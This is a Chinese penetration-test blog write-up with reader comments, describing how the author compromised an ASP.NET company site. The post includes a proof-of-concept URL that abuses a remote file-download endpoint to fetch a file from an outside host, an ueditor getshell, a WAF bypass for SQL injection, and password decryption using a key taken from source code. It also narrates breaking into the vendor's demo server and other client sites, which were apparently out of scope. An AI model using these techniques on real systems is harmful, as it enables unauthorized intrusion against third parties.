实战渗透-实战渗透之一个破站日一天

文章为本人所写
转载注明出处

使用关键词得到目标源码

某日上午接到临时安排对某公司进行渗透测试,此次渗透给的是一个主域名,并且也没有子域,打开了目标网站先对其进行一波信息收集
2023-07-19T10:49:51.png
中间件: IIS 8.5
2023-07-19T10:50:07.png
输入admin发现自动添加了/
说明其目录存在,那么盲猜一波文件,login.aspx default.aspx main.aspx 等等
2023-07-19T10:51:39.png
最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令??
一顿操作过后账号被锁
2023-07-19T10:51:53.png
熟悉的开局,既然如此只能尝试其他方法了。
在主页的html代码中发现了某处信息
2023-07-19T10:52:03.png
设计制作?根据后面的域名访问过去,是一个建站公司
那么,入手点来了。IIS8.5+ASP.NET+建站系统
先扫一波备份文件:
2023-07-19T10:52:14.png
400多条ip这开发商还行。使用FOFA查询工具,批量导出
2023-07-19T10:52:24.png
然后我们来扫一下备份文件。这里推荐我B哥的扫描器
https://github.com/broken5/WebAliveScan
可以进行批量存活扫描和目录扫描
2023-07-19T10:52:34.png
在好几个站下面发现web.zip备份文件。
下载下来过后,对其目标站点文件进行了对比。基本一致
2023-07-19T10:52:48.png

拿到代码开始审计多次碰壁

那么开始审计。
2023-07-19T10:53:22.png
在某接口处放下敏感操作 WebClient.DownloadFile (远程文件下载)
2023-07-19T10:53:11.png
由于该方法需要提供绝对路径。。比较头疼,但我跟踪相关参数。发现。
在另一个方法中调用了该方法。
2023-07-19T10:53:46.png
并传入Server.MapPath,这根本不需要找绝对路径了系统都给你安排好了。
那么构造POC:
ashx/api.ashx?m=downloadfile&FilePath=asmx.jpg&WebUrl=http://*.cn/
2023-07-19T10:53:57.png
访问地址:
2023-07-19T10:54:09.png
文件存在,那么证明可行
回到目标地址:
2023-07-19T10:54:21.png
被修复了文件不存在
继续回到代码中,审计其他漏洞在其他接口中,也均存在多个漏洞。如ueditor远程抓取漏洞
2023-07-19T10:54:30.png
文件重命名可Getshell

2023-07-19T10:54:39.png

但是这些接口都需要登录
2023-07-19T10:54:48.png
这就很头疼了,打算在一些无需登录的接口中尝试寻找SQL注入。
最终在某处发现SQL拼接。
2023-07-19T10:54:59.png
但是这里调用了IsSafeSqlString检测
2023-07-19T10:55:07.png
常见符号基本被卡的死死的

拿下开发商寻找通用账号逆向加解密算法

由于都是使用了相同的建站程序,怀疑有程序内置账户
于是准备通过刚才审计出来的漏洞。从同程序的站点入手
最终在某个站点成功拿到Webshell
看了下相关信息
2023-07-19T10:55:20.png
居然是厂商的演示站群,存了该开发商所有站点源码。
应该是在开发过程中的演示环境吧站点有很多,估计每个客户都有。
在服务器里翻到了目标站点的演示网站
2023-07-19T10:55:28.png
根目录下有zip网站备份和sql 数据库备份。
如果说目标站点是直接搬迁过去的,那么后台账户密码应该是一样的。
将其SQL文件下载下来。再其中搜索相关信息
2023-07-19T10:55:37.png
发现了插入账户的SQL语句。其密码是加密过的
2023-07-19T10:55:46.png
cmd5解不开,看了下密文是33位加密。
但是登录过程中,密码是RSA加密过后传输的,而后端居然是33位的md5加密
2023-07-19T10:56:01.png
因为有源代码,追踪了一下登录了相关方法。
2023-07-19T10:56:12.png
密码传入后,调用了CommFun.EnPwd进行了一次加密。
追踪EnPwd方法
2023-07-19T10:56:28.png
可以看到,传入进来的密码是RSA类型,先进行了一次RSA解密,然后进行了一次DES加密。
追踪DESEncrypt.Encrypt方法。
2023-07-19T10:56:36.png
这里是将Encrypt方法封装了一下,并传入加密key。
其核心加密方法为下:
2023-07-19T10:56:49.png
并且,在该类里。还定义了解密方法
2023-07-19T10:56:59.png
得到了加密方法和解密方法以及key。那么只需要将其单独拉出来调用就可以了。
2023-07-19T10:57:10.png
将得到加密字符进行解密,得到结果
2023-07-19T10:57:19.png
尝试登录
2023-07-19T10:57:31.png
忙活半天,白干了。

柳暗花明拿下目标shell

已经下午4点了。还是一无进展,准备尝试绕过SQL过滤。
就在这时候,我发现了一处SQL注入点。
2023-07-19T10:57:40.png
某方法接收了两个参数,却只对一个参数进行了过滤。
在目标网站上测验
2023-07-19T10:57:50.png
存在注入,发现存在waf使用垃圾参数填充成功绕过waf

2023-07-19T10:57:57.png

直接上sqlmap安心的跑,得到系统账户以及密文
2023-07-19T10:58:05.png
将得到的密文进行解密,得到结果

2023-07-19T10:58:15.png

尝试登录。这下总对了吧!
2023-07-19T10:58:23.png
终于进来了!!!!
经过之前的审计,发现了很多接口都存在漏洞,现在成功登录了。岂不是随便getshell?
直接ueditor带走。
2023-07-19T10:58:32.png
成功shell

本文链接:

https://www.websecuritys.cn/index.php/archives/217/
1 + 6 =
10 评论
    heiheiChrome 104Windows 10
    2022年09月08日 回复

    海神请教一下,文章中说“在某接口处放下敏感操作 WebClient.DownloadFile (远程文件下载)由于该方法需要提供绝对路径”,这个(WebClient.DownloadFile )方法需要绝对路径,这是什么原因呢从代码中看没看明白。

      yuanhaiChrome 105Windows 10
      2022年09月17日 回复

      @heihei 这个是.Net自带的一个类,WebClient,下面的DownloadFile方法,意思就是可以将一个远程文件下载到本地,但是再本地的存储路径要绝对路径

        heiheiSogo BrowserWindows 10
        2022年09月21日 回复

        @yuanhai 感谢懂了

    喝口可乐打个嗝Firefox Browser 84Windows 10
    2021年01月19日 回复

    海神用的FOFA工具项目地址求给一个。

        喝口可乐打个嗝Firefox Browser 84Windows 10
        2021年01月20日 回复

        @yuanhai 谢谢海神!!

    望海寺快下课Chrome 86Windows 7
    2020年12月08日 回复

    海哥yyds!!!

    --+qweChrome 87Windows 10
    2020年11月30日 回复

    永远的海神·~

    夏寒Chrome 87Windows 7
    2020年11月29日 回复

    海哥nb

    catw0rldChrome 86Windows 10
    2020年11月29日 回复

    海哥tql